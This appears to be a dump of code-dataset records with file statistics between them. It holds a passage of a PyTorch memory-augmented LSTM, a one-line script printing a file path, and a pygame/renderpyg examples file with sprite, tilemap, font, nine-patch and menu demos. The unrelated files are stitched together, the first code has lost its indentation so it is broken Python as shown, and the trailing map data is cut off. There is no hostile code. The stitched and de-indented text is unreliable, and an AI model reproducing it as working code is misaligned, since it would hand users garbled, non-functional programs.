torch.nn.functional.normalize(self.u_t,dim=1).unsqueeze(1).expand(-1,self.mem_cap,-1)],dim=2)
h_read_head=self.fc(h_read_head)
h_read_head=torch.bmm(torch.tanh(h_read_head),self.vec_a.unsqueeze(0).expand(x.shape[0],-1,-1)).squeeze(2)
h_read_head=h_read_head-self.prev_read_location*100
#added:
h_read_head=torch.nn.functional.normalize(h_read_head,dim=1)
r,h_read_index=self.read(h_read_head,self.tau)
self.prev_read_location=h_read_index
self.u_t=self.u_t+h_read_index
new_h=torch.cat([h,r],dim=1)
concat0 = torch.cat((x,new_h), dim= 1)
concat1 = torch.mm(concat0,self.W_full) + self.bias
i,f,o = torch.split(concat1,h_size, dim=1)
alpha,beta=torch.split(self.gumbel_sigmoid(torch.mm(concat0,self.W_full1)+self.bias1,10/3),1,dim=1)
concat2= concat0
concat2= concat0 * torch.cat([torch.ones_like(x),torch.ones_like(h)*alpha,torch.ones_like(r)*beta],dim=1)
new_c=torch.tanh(torch.mm(concat2,self.W_full2)+self.bias2)
new_c = c * torch.sigmoid(f + self.f_bias) + torch.sigmoid(i) * new_c
new_h = torch.tanh(new_c) * torch.sigmoid(o)
if self.memcnt<self.mem_cap:
h_write_index=torch.cat([torch.zeros(self.memcnt),torch.ones(1),torch.zeros(self.mem_cap-1-self.memcnt)]).unsqueeze(0)
self.memcnt+=1
else:
h_write_index=h_read_index.detach()
self.write(self.fc1(torch.cat((x,new_h),dim=1)),h_write_index)
output=torch.cat([new_h,r],dim=1)
self.recurrent_state=(new_h,new_c)
return output
def zero_state(self, batch_size):
h = torch.zeros([batch_size, self.num_units])+torch.tanh(self.h_bias)
c = torch.zeros([batch_size, self.num_units])+torch.tanh(self.c_bias)
self.recurrent_state=(h, c)
def _reset_mem(self,batch_size):
self.memcnt=0
self.hmem=torch.zeros(batch_size,self.mem_cap,self.r_size)+self.hmem_bias
self.prev_read_location=torch.zeros(batch_size,self.mem_cap)
self.u_t=torch.zeros(batch_size,self.mem_cap)
def _reload_mem(self):
self.hmem=self.hmem.detach()
self.prev_read_location=self.prev_read_location.detach()
self.u_t=self.u_t.detach()
def set_tau(self,num):
self.tau=num
def write(self,h,h_index):
h_ones=h_index.unsqueeze(2)
self.hmem=h.unsqueeze(1)*h_ones+self.hmem*(1.-h_ones)
def read(self,h_read_head,tau):
h_index,_=self.gumbel_softmax(h_read_head,tau)
h_entry=h_index.unsqueeze(2)*self.hmem
h_entry=h_entry.sum(dim=1)
return h_entry,h_index
def gumbel_softmax(self,input, tau):
gumbel = -torch.log(1e-20-torch.log(1e-20+torch.rand(*input.shape)))
y=torch.nn.functional.softmax((input+gumbel)*tau,dim=1)
ymax,pos=y.max(dim=1)
hard_y=torch.eq(y,ymax.unsqueeze(1)).float()
y=(hard_y-y).detach()+y
return y,pos
def gumbel_sigmoid(self,input,tau):
gumbel = -torch.log(1e-20-torch.log(1e-20+torch.rand(*input.shape)))
y=torch.sigmoid((input+gumbel)*tau)
return y
class ARMIN_with_TARDIS_addr(nn.Module):
def __init__(self,config,input_size,num_units, use_zoneout=True,
use_ln=True,indrop=True,outdrop=True, f_bias = 1.):
super().__init__()
self.input_size=input_size
self.num_units = num_units
self.f_bias = f_bias
self.use_zoneout = use_zoneout
self.use_ln=use_ln
self.indrop=indrop
self.outdrop=outdrop
x_size=input_size
h_size=num_units
self.r_size=r_size=config.r_size
self.W_full = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, r_size+4* h_size] , scale = 1.0))
self.bias = nn.Parameter(torch.zeros([r_size+4*h_size]))
self.W_full1 = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, r_size+h_size] , scale = 1.0))
self.bias1 = nn.Parameter(torch.zeros([r_size+h_size]))
self.trans=nn.Linear(h_size+x_size,r_size)
torch.nn.init.orthogonal_(self.trans.weight)
torch.nn.init.constant_(self.trans.bias,0)
self.c_bias=nn.Parameter(torch.rand(1,num_units))
self.hmem_bias=nn.Parameter(torch.zeros(1,config.mem_cap,r_size))
self.memcnt=0
self.mem_cap=config.mem_cap
self.tau=1.
self.keys= nn.Parameter(torch.zeros(config.mem_cap,config.key_size))
self.vec_a=nn.Parameter(torch.zeros(h_size//4,1))
nn.init.orthogonal_(self.keys)
nn.init.xavier_uniform_(self.vec_a)
self.fc=nn.Linear(x_size+r_size+h_size+config.key_size+config.mem_cap,h_size//4)
self.fc.weight.data=helper.orthogonal_initializer([self.fc.weight.shape[1],self.fc.weight.shape[0]]).t_()
torch.nn.init.constant_(self.fc.bias,0)
self.u_t=None
self.prev_read_location=None
def forward(self, x0,state=None):
h,c= self.recurrent_state
x=x0
h_size = self.num_units
x_size = self.input_size
h_read_head=torch.cat([torch.cat([x,c],dim=1).unsqueeze(1).expand(-1,self.mem_cap,-1),
self.keys.unsqueeze(0).expand(x.shape[0],-1,-1),
self.hmem,
torch.nn.functional.normalize(self.u_t,dim=1).unsqueeze(1).expand(-1,self.mem_cap,-1)],dim=2)
h_read_head=self.fc(h_read_head).squeeze(2)
h_read_head=torch.bmm(torch.tanh(h_read_head),self.vec_a.unsqueeze(0).expand(x.shape[0],-1,-1)).squeeze(2)
h_read_head=h_read_head-self.prev_read_location*100
h_read_head=torch.nn.functional.normalize(h_read_head,dim=1)
h_entry,h_read_index=self.read(h_read_head,self.tau)
self.prev_read_location=h_read_index
self.u_t=self.u_t+h_read_index
new_c=torch.cat([c,h_entry],dim=1)
concat = torch.cat((x,new_c), dim= 1)
concat1=torch.mm(concat,self.W_full1) +self.bias1
concat1=torch.sigmoid(concat1)
concat1=torch.cat([torch.ones_like(x),concat1],dim=1)
concat = concat*concat1
concat = torch.mm(concat,self.W_full) + self.bias
i,j,f,o,om = torch.split(concat,h_size, dim=1)
new_c = c * torch.sigmoid(f + self.f_bias) + torch.sigmoid(i) * torch.tanh(j)
new_c=torch.tanh(new_c)
new_h = new_c * torch.sigmoid(o)
r = h_entry * torch.sigmoid(om)
if self.memcnt<self.mem_cap:
h_write_index=torch.cat([torch.zeros(self.memcnt),torch.ones(1),torch.zeros(self.mem_cap-1-self.memcnt)]).unsqueeze(0)
self.memcnt+=1
else:
h_write_index=h_read_index.detach()
self.write(self.trans(torch.cat((x,new_c),dim=1)),h_write_index)
new_r=torch.cat([new_h,r],dim=1)
self.recurrent_state=(new_h,new_c)
return new_r
def zero_state(self, batch_size):
h = torch.zeros([batch_size, self.num_units])
c = torch.zeros([batch_size, self.num_units])+torch.tanh(self.c_bias)
self.recurrent_state=(h,c)
def _reset_mem(self,batch_size):
self.memcnt=0
self.hmem=torch.zeros(batch_size,self.mem_cap,self.r_size)+self.hmem_bias
self.prev_read_location=torch.zeros(batch_size,self.mem_cap)
self.u_t=torch.zeros(batch_size,self.mem_cap)
def _reload_mem(self):
self.hmem=self.hmem.detach()
self.prev_read_location=self.prev_read_location.detach()
self.u_t=self.u_t.detach()
def set_tau(self,num):
self.tau=num
def write(self,h,h_index):
h_ones=h_index.unsqueeze(2)
self.hmem=h.unsqueeze(1)*h_ones+self.hmem*(1.-h_ones)
def read(self,h_read_head,tau):
h_index,_=self.gumbel_softmax(h_read_head,tau)
h_entry=h_index.unsqueeze(2)*self.hmem
h_entry=h_entry.sum(dim=1)
return h_entry,h_index
def gumbel_softmax(self,input, tau):
gumbel = -torch.log(1e-20-torch.log(1e-20+torch.rand(*input.shape)))
y=torch.nn.functional.softmax((input+gumbel)*tau,dim=1)
ymax,pos=y.max(dim=1)
hard_y=torch.eq(y,ymax.unsqueeze(1)).float()
y=(hard_y-y).detach()+y
return y,pos
| 38.148148 | 130 | 0.64249 | 2,829 | 17,510 | 3.733121 | 0.055143 | 0.038633 | 0.025566 | 0.033804 | 0.8984 | 0.880977 | 0.865448 | 0.859767 | 0.853612 | 0.821513 | 0 | 0.018705 | 0.218389 | 17,510 | 458 | 131 | 38.231441 | 0.752959 | 0.000343 | 0 | 0.771831 | 0 | 0 | 0.001886 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098592 | false | 0 | 0.022535 | 0.002817 | 0.169014 | 0.002817 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
429fbfe9d1a7b818a67d9ad5ae1aab450a8b4208 | 33 | py | Python | codeup/1007.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 3 | 2019-03-09T05:19:23.000Z | 2019-04-06T09:26:36.000Z | codeup/1007.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 1 | 2020-02-23T10:38:04.000Z | 2020-02-23T10:38:04.000Z | codeup/1007.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 1 | 2019-05-22T13:47:53.000Z | 2019-05-22T13:47:53.000Z | print('"C:\Download\hello.cpp"')
| 16.5 | 32 | 0.666667 | 5 | 33 | 4.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030303 | 33 | 1 | 33 | 33 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0.69697 | 0.69697 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
c41058625abae1d27d684f43c4ef9f485c686a9a | 38,741 | py | Python | renderpyg/examples.py | mcpalmer1980/renderpyg | 661205f372486968684c0be15596b8cb257607ce | [
"MIT"
] | 7 | 2020-12-20T08:02:39.000Z | 2021-03-31T14:36:36.000Z | renderpyg/examples.py | mcpalmer1980/renderpyg | 661205f372486968684c0be15596b8cb257607ce | [
"MIT"
] | null | null | null | renderpyg/examples.py | mcpalmer1980/renderpyg | 661205f372486968684c0be15596b8cb257607ce | [
"MIT"
] | 1 | 2020-12-19T21:41:19.000Z | 2020-12-19T21:41:19.000Z | '''
examples.py: A colletion of examples for renderpyg
You can call this script with the name of an example to launch it.
Each example is a single in this file listed in the following order.
sprite
tfont
tilemap
nine
This file is part of renderpyg
renderpyg is a python package providing higher level features for
pygame. It uses the pygame._sdl2.video API to provide hardware GPU
texture rendering.
renderpyg is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
pytmx is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with renderpyg.
If not, see <http://www.gnu.org/licenses/>.
'''
import os, sys, random, math
import pygame as pg
from pygame._sdl2 import Window, Renderer, Texture, Image
import renderpyg as pyg
from renderpyg import Sprite, TextureFont, keyrange, load_texture
from random import randrange
# Set sdl2 for anisotropic filtering:
# (0 for no filtering, 1 for bilinear filtering, 2 for anisotropic)
os.environ['SDL_RENDER_SCALE_QUALITY'] = '2'
EXAMPLE_DATA = os.path.join(os.path.dirname(__file__), 'data', '')
RENDER_RESOLUTION = (1600, 900)
WINDOW_RESOLUTION = (1600, 900)
SMALL_RESOLUTION = (800, 450)
FRAMES_PER_SECOND = 30
FONT = EXAMPLE_DATA+'font.ttf'
FONT_SIZE = 72
SPRITE_COUNT = 30
FONT_PARAMS = dict(
text='Dancing Font', x=10, y=10, color=(175,0,0), variance=30,
circle=3, rotate=15, scale=.25, colors=(75,0,0))
EXAMPLES = dict(
sprites='animates alien sprites',
tilemap='scroll and zoom a garden',
tfont='select animated fonts from a list',
nine='scale nine patch images',
packed='animate frames from given TexturePacker xml',
menu='interact with a few example menus')
def sprites():
pg.init()
clock = pg.time.Clock()
window = Window("Renderpyg Example", size=WINDOW_RESOLUTION)
renderer = Renderer(window, vsync=True)
"""
We will draw into a buffer texture to allow easy resolution changes
It will also make it easier to apply screen transitions and similar effects later
When using pygame._sdl2.video you do not call pygame.display.setmode()
Therefore calling surface.convert() or surface.convert_alpha() will throw an error
When you create a Texture that needs alpha blending you must set its blend mode
Alpha blending will be set automatically when loading from an image with transparency, such as PNG
Remember to use the buffer size instead of the window size when drawing onto the offscreen buffer
This will allow you to scale the screen to any window or fullscreen desktop size
"""
buffer = Texture(renderer, RENDER_RESOLUTION, target=True)
buffer.blend_mode = 1
screensize = buffer.get_rect()
"""
You can set fullscreen when creating the window by using Window(title, size, desktop_fullscreen=True)
I prefer creating a window before going to fullscreen to avoid strange window placement that occurs
if you exit fullscreen later on.
"""
FULLSCREEN = False
if FULLSCREEN:
window.set_fullscreen(True)
"""
Font features in pygame are design for blitting to a surface, not for GPU rendering
It is possible to create a streaming texture and then using texture.update() to update the texture
from a pygame surface, but accessing GPU memory is slow and this should be done sparingly.
Therefore I created a simple TextureFont class. We will use the animation feature of this class
for a little extra fun. We will also create some sprites and let them animate too.
Also, for this example we use a Character class to move and rotate individual characters across
the screen. This is very similar to how you will handle sprites later.
"""
tfont = TextureFont(renderer, FONT, FONT_SIZE)
sprite = Sprite((renderer, EXAMPLE_DATA+'texture.xml'))
group = pg.sprite.Group()
animations = [
keyrange(0, 7, 200),
keyrange(7, 14, 200),
keyrange(14, 21, 200),
keyrange(28, 35, 200)]
for _ in range(SPRITE_COUNT):
spr = Sprite(sprite.images)
spr.set_pos(
randrange(0, RENDER_RESOLUTION[0]),
randrange(0, RENDER_RESOLUTION[1]) )
spr.set_animation(random.choice(animations), -1)
spr.velocity = pg.Vector2(
randrange(-20, 20),
randrange(-20, 20))
if randrange(10) < 2:
spr.rotation = randrange(-10, 11)
group.add(spr)
"""
Here starts a simple game loop
Press SPACE to toggle between a large window, a small window, and fullscreen
Press ENTER to add more characters to the screen
At the beginning of each frame we must set the renderer target to our buffer Texture
All the following draw calls will be drawn to the buffer instead of the screen
After all of our drawing, we reset the target and draw the buffer onto the screen
"""
timer = pg.time.get_ticks()
delta = 0
running = True
while running:
renderer.target = buffer
for event in pg.event.get():
if event.type == pg.QUIT:
running = False
elif event.type == pg.KEYDOWN:
if event.key == pg.K_ESCAPE:
running = False
elif event.key == pg.K_SPACE:
if FULLSCREEN:
FULLSCREEN = False
window.size = WINDOW_RESOLUTION
window.set_windowed()
elif window.size == WINDOW_RESOLUTION:
window.size = SMALL_RESOLUTION
else:
FULLSCREEN = True
window.size = WINDOW_RESOLUTION
window.set_fullscreen(True)
#Must set the draw color before clearing the scren or drawing lines and rectt
renderer.draw_color = (0,0,0,255)
renderer.clear()
"""
Draw the background image if available.
By default Texture.draw() will fill the renderer unless you supply a destination Rect
texture.draw( dstrect=Rect(x, y, width, height) )
"""
group.update(delta)
group.draw()
tfont.animate(**FONT_PARAMS)
# Setting renderer.target = None will make following draw calls render to the underlying window
# Since we don't provide a dstrect it will fill the renderer
renderer.target = None
buffer.draw()
renderer.present() # all draw calls occur and the screen is updated here
delta = clock.tick(FRAMES_PER_SECOND)
def tilemap():
from .tilemap import load_tilemap_string, load_tileset, render_tilemap, tile_background, Tilemap
pg.init()
window = Window('Testing', (1600,900))
renderer = Renderer(window)
clock = pg.time.Clock()
tfont = TextureFont(renderer, None, 48)
"""
We could load the tilemap and its images by loading the included
tmx file, but we'll load the tilemap from the map_data string and
the images from tile.png with load_tileset().
A pygame.Vector2 is used for the camera
"""
#tilemap = load_tmx(renderer, path+'tilemap.tmx')
loaded_map = load_tilemap_string(map_data)
loaded_cells = load_tileset(renderer, EXAMPLE_DATA+'tiles.png', 64,64)
tilemap = Tilemap(loaded_map, loaded_cells)
tilemap.update_tilemap(loaded_map, 0)
tilemap.add_layer(loaded_map)
background = load_texture(renderer, EXAMPLE_DATA+'grass.png')
camera = pg.Vector3(800,450,1)
scale = 1
texture = load_texture(renderer, EXAMPLE_DATA+'aliens.png')
group = pg.sprite.Group()
for _ in range(10):
spr = Sprite(texture, 7, 8, by_count=True)
spr.set_pos(
random.randint(0, tilemap.width * tilemap.tilewidth),
random.randint(0, tilemap.height * tilemap.tileheight))
spr.set_transform(camera)
group.add(spr)
delta = 0
running = True
while running:
for event in pg.event.get():
if event.type == pg.QUIT:
running = False
elif event.type == pg.KEYDOWN:
if event.key == pg.K_ESCAPE:
running = False
elif event.key == pg.K_SPACE:
if FULLSCREEN:
FULLSCREEN = False
window.size = WINDOW_RESOLUTION
window.set_windowed()
elif window.size == WINDOW_RESOLUTION:
window.size = SMALL_RESOLUTION
else:
FULLSCREEN = True
window.size = WINDOW_RESOLUTION
window.set_fullscreen(True)
elif event.type == pg.MOUSEMOTION:
x, y = pg.mouse.get_rel()
if pg.mouse.get_pressed()[0]:
camera.x -= x*2
camera.y -= y*2
elif event.type == pg.MOUSEBUTTONUP:
if event.button == 4:
scale += 0.01
elif event.button == 5:
scale -= 0.01
camera[2] = scale
render_tilemap(tilemap, camera, scale, center=True, clamp=True, background=background)
group.update(delta)
group.draw()
tfont.draw('Click and drag to scroll, wheel to zoom', 10, 10)
tfont.draw('Camera {} Scale: {:.1f}%'.format(camera, scale*100), 10, 60)
renderer.present()
renderer.draw_color = (0,0,0,255)
renderer.clear()
delta = clock.tick(FRAMES_PER_SECOND)
def tfont():
from .tfont import NinePatch
examples = {
'Radiantly Red': dict(color=(220,0,0), colors=(-100,0,0),
circle=3, zoom=5, duration=5000, rotate=25, variance=10),
'Blistering Blue': dict(color=(0,0,255), move=(8,0), fade=200,
spread=25, duration=200),
'Vividly Violet': dict(color=(238,130,238), colors=(-30,-30,-30),
move=(10,10), rotate=5, zoom=5, duration=3000),
'Garishly Green': dict(color=(0,100,0), colors=(0,-50,0), zoom=20,
duration=5000, variance=33),
'Whispy White': dict(color=(255,255,255), fade=100, circle=10,
variance=5, duration=9000)
}
example_list = list(examples.keys())
default = dict(color=(255,255,0), move=(5,2), rotate=4, duration=3000)
pg.init()
clock = pg.time.Clock()
window = Window("TextureFont Test", size=SMALL_RESOLUTION)
renderer = Renderer(window, vsync=True)
font = EXAMPLE_DATA+'font.ttf'
tfont = TextureFont(renderer, font, FONT_SIZE)
selected = 0
running = True
while running:
for event in pg.event.get():
if event.type == pg.QUIT:
running = False
elif event.type == pg.KEYDOWN:
if event.key == pg.K_UP:
selected -= 1
if selected < 0:
selected = len(examples) - 1
elif event.key == pg.K_DOWN:
selected += 1
if selected >= len(examples):
selected = 0
else:
running = False
renderer.draw_color = (0,0,0,255)
renderer.clear()
x = SMALL_RESOLUTION[0] // 2
y = 20
for i, item in enumerate(example_list):
if i==selected:
tfont.animate(
item, x, y, center=True, **examples[item])
else:
tfont.animate(item, x, y, center=True, **default)
y += tfont.height * 1.2
renderer.present()
clock.tick(30)
def nine():
from .tfont import NinePatch
pg.init()
clock = pg.time.Clock()
window = Window("NinePatch Test", size=RENDER_RESOLUTION)
renderer = Renderer(window, vsync=True)
screen_size = renderer.get_viewport()
tfont = TextureFont(renderer, EXAMPLE_DATA+'font.ttf', 64)
texture = load_texture(renderer, EXAMPLE_DATA+'nine.png')
patches = (
NinePatch(texture, (20, 20, 20, 20), (0, 0, 320, 167)),
NinePatch(texture, (52,52,52,52), (0, 168, 320, 173)),
NinePatch(texture, (32, 32, 32, 32), (0, 345, 320, 223)),
NinePatch(texture, (32, 32, 32, 32), (0, 572, 320, 160)))
selected = 0
running = True
while running:
for event in pg.event.get():
if event.type == pg.QUIT:
running = False
elif event.type == pg.KEYDOWN:
if event.key == pg.K_UP:
selected -= 1
if selected < 0:
selected = len(patches) - 1
elif event.key == pg.K_DOWN:
selected += 1
if selected >= len(patches):
selected = 0
else:
running = False
elif event.type == pg.MOUSEBUTTONDOWN:
selected += 1
if selected >= len(patches):
selected = 0
renderer.draw_color = (0,0,0,255)
renderer.clear()
x, y = pg.mouse.get_pos()
rect = pg.Rect(10, 10, x, y)
patches[selected].draw(rect)
center = max(rect.centerx, tfont.width('Move or click mouse') // 2)
tfont.draw('Move or click mouse', center, rect.centery, color=(255,0,0),
center = True, centery=True)
renderer.present()
clock.tick(30)
def packed(*args):
from .base import load_xml_images, scale_rect
if args:
filename = args[0]
else:
filename = EXAMPLE_DATA+'texture.xml'
pg.init()
clock = pg.time.Clock()
window = Window("TexturePacker Test", size=SMALL_RESOLUTION)
renderer = Renderer(window, vsync=True)
clock = pg.time.Clock()
images = load_xml_images(renderer, filename)
dst = scale_rect(images[0].get_rect(), 2)
dst.center = renderer.get_viewport().center
for image in images:
image.draw(dstrect=dst)
renderer.present()
clock.tick(5)
renderer.clear()
pg.event.pump()
def menu():
from renderpyg import fetch_images, NinePatch, Menu, keyframes
os.environ['SDL_RENDER_SCALE_QUALITY'] = '2'
EXAMPLE_DATA = os.path.join(os.path.dirname(__file__), 'data', '')
pg.init()
clock = pg.time.Clock()
window = Window("NinePatch Test", size=(900,600))
renderer = Renderer(window, vsync=True)
font, tfont = TextureFont.multi_font(renderer, (
(EXAMPLE_DATA+'font.ttf', 32),
(EXAMPLE_DATA+'font2.ttf', 32)))
texture = load_texture(renderer, EXAMPLE_DATA+'nine.png')
button = NinePatch(texture, (20,20,20,20), (0, 0, 320, 167))
dialog = NinePatch(texture, (32,32,32,32), (0,169, 320, 161))
box = NinePatch(texture, (22,24,22,24), (0, 332, 320, 106))
box_fill = NinePatch(texture, (22,24,22,24), (0, 439, 320, 106))
arrow_r, arrow_l, circle, bar = fetch_images(
texture, rects=(
(11, 559, 42, 42),
(11, 559, 42, 42),
(64, 547, 62, 62),
(373,225, 222, 18)))
arrow_l.flipX = True
spinner = Sprite((circle,), 0,0 )
spinner.set_animation(keyframes((0,), 500, rotation=60))
spinner.set_clock(clock)
alien = Sprite(
(renderer, EXAMPLE_DATA+'texture.xml'), 7, 8, by_count=True)
alien.set_animation(keyrange(0, 7, 200))
alien.set_clock(clock)
selection = ['button {}'.format(n) for n in range(29)]
good_sound = pg.mixer.Sound(EXAMPLE_DATA+'click.ogg')
bad_sound = pg.mixer.Sound(EXAMPLE_DATA+'cancel.ogg')
background = load_texture(renderer, EXAMPLE_DATA+'grass.png')
title = 'RenderPyg'
anim_light = dict(move=(2,0), rotate=7)
anim_heavy = dict(circle=2, rotate=15, variance=20, zoom=5)
joy = None
if pg.joystick.get_count() > 0:
joy = (pg.joystick.Joystick(0), 0, 1)
if joy.init():
joy = None
menu_basic = Menu(
renderer, font, clock=clock,
box=((255,255,255), (0,0,0), 4),
color=(150,150,150), label=(200,200,200),
sel_color=(255,255,255),
position = 6,
text_scale=.6,
)
menu_classic = Menu(
renderer, font, clock=clock,
sel_color=(255,255,255), sel_left=spinner,
color=(150,150,150), label=(200,200,200),
box=box, box_fill=circle,
text_scale=.6,
)
menu_spinner = Menu(
renderer, font, clock=clock, spacing=6,
patch=dialog, but_patch=button, but_padding=(30, 30),
sel_left=spinner,
opt_left=arrow_l, opt_right=arrow_r,
box=box, box_fill=box_fill, box_textc=(0,50,50),
text_font=tfont, text_scale =.5,
title_font=tfont, title_scale=1.25, title_color=(0,0,200)
)
menu_full = Menu(
renderer, font, clock=clock, spacing=6,
patch=dialog, but_patch=button, but_padding=(40, 15),
sel_patch=button,
opt_left=arrow_l, opt_right=arrow_r,
box=box, box_fill=box_fill, box_textc=(0,50,50),
text_font=tfont, text_scale =.4,
title_font=tfont, title_scale=1.25, title_color=(0,0,200)
)
menu = menu_spinner
menu.title_anim = anim_light
options = dict(
type=('blank', 'oldschool', 'spinner', 'full', ('menu: ','')),
back=('off', 'on', ('back: ','')),
lab1='text',
color=('white', 'red', 'blue'),
anim=('none', 'some', 'lots', ('anim: ', '')),
anim_speed={'type': 'SLIDER', 'label': 'speed', 'min': 1, 'max': 9, 'step': 1} )
def set_options():
global menu
new_menu = options['type']['value']
menu = {'blank': menu_basic,
'oldschool': menu_classic,
'spinner': menu_spinner,
'full': menu_full}[new_menu]
back = background if options['back']['value'] == 'on' else (0,0,0)
menu.set_background(back)
color = options['color']['value']
if color == 'red':
menu.color = (255,0,0)
menu.label = (150,0,0)
menu.sel_color = (0,0,255)
elif color == 'blue':
menu.color = (0,0,255)
menu.label = (0,0,150)
menu.sel_color = (255,0,0)
else:
menu.color = (150,150,150)
menu.label = (150,150,150)
menu.sel_color = (255,255,255)
anim, speed = options['anim']['value'], options['anim_speed']['value']
anim_light['duration'] = (7 - speed) * 1000
anim_heavy['duration'] = (7 - speed) * 1000
if anim == 'some':
menu.sel_anim = menu.title_anim = anim_light
menu.anim = menu.text_anim = None
elif anim == 'lots':
menu.sel_anim = menu.title_anim = anim_heavy
menu.anim = menu.text_anim = anim_light
else:
menu.sel_anim = menu.title_anim = None
menu.anim = menu.text_anim = None
return menu
running = True
while running:
if menu == menu_classic:
menu.position = random.choice((1, 6, 8))
result = menu.select(('list', 'dialog', 'input', 'options', 'quit'), title)[1]
if result == 'list':
menu.select(selection, None)
elif result == 'dialog':
menu.dialog(text_data, title, ('Okay',), 600)
elif result == 'input':
text, i, button = menu.input('New Title', ('Okay', 'Cancel'))
title = text if button == 'Okay' else title
elif result == 'options':
clicked, new = menu.options(options, title, buttons=('Okay', 'Cancel'))
if clicked == 'Okay' or True:
options = new
menu = set_options()
else:
running = False
'''
# Here is how to use a modeless menu
menu.input('Type Me', buttons=('Okay', 'Cancel'), modeless=True)
while menu.alive:
# Do Your Work here
results = menu.handle()
renderer.present()
clock.tick(30)
print(results)
'''
text_data = """Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions."""
map_data = """
7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,
7,0,0,0,0,0,0,0,0,0,34,31,0,0,0,0,4,4,0,0,0,0,0,0,0,0,51,0,0,0,0,0,40,0,0,0,33,29,29,29,29,29,29,29,29,29,29,29,29,26,26,26,26,26,26,26,26,28,0,0,0,7,7,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,14,0,0,0,50,0,0,0,0,50,0,0,0,0,0,0,0,51,0,0,0,0,0,4,0,0,0,0,6,1,1,1,1,1,1,1,1,1,1,1,7,
7,0,0,0,0,0,0,0,0,34,26,26,31,0,0,0,4,4,0,0,0,0,0,0,51,0,0,0,0,0,0,0,40,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,7,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,14,0,0,8,4,9,0,50,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,4,0,0,0,51,6,1,1,1,1,1,1,1,1,1,1,1,7,
7,0,0,0,0,0,0,0,0,33,26,26,32,0,0,0,4,4,50,0,0,0,0,0,0,0,0,0,0,51,0,51,40,0,0,0,34,27,27,27,27,27,27,27,27,27,27,31,0,30,26,26,26,26,26,26,29,32,0,51,0,7,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,14,0,51,4,4,4,0,50,6,6,6,1,6,6,6,12,7,12,7,12,7,12,7,4,0,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,0,0,0,0,0,0,0,0,0,33,32,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,26,26,26,26,26,26,26,26,26,26,28,0,30,26,26,26,26,26,28,0,0,0,0,0,7,7,0,0,50,0,50,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,14,0,0,4,4,4,0,0,6,1,1,1,1,1,6,7,0,7,0,7,0,7,0,4,0,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,0,0,0,0,0,0,0,0,0,51,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,26,26,26,29,29,29,29,29,29,29,28,0,30,26,26,26,26,26,28,0,35,0,0,0,7,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,14,0,0,4,4,4,0,0,6,1,1,1,1,1,6,0,0,0,0,0,0,0,0,1,50,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,51,0,0,0,0,0,0,0,0,0,0,0,0,0,51,4,4,0,50,51,0,0,0,0,0,51,0,0,0,0,51,40,51,0,50,30,26,26,28,0,0,0,0,0,0,0,40,0,30,26,26,26,26,26,28,0,40,51,0,0,7,7,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,14,0,51,4,4,4,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,4,0,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
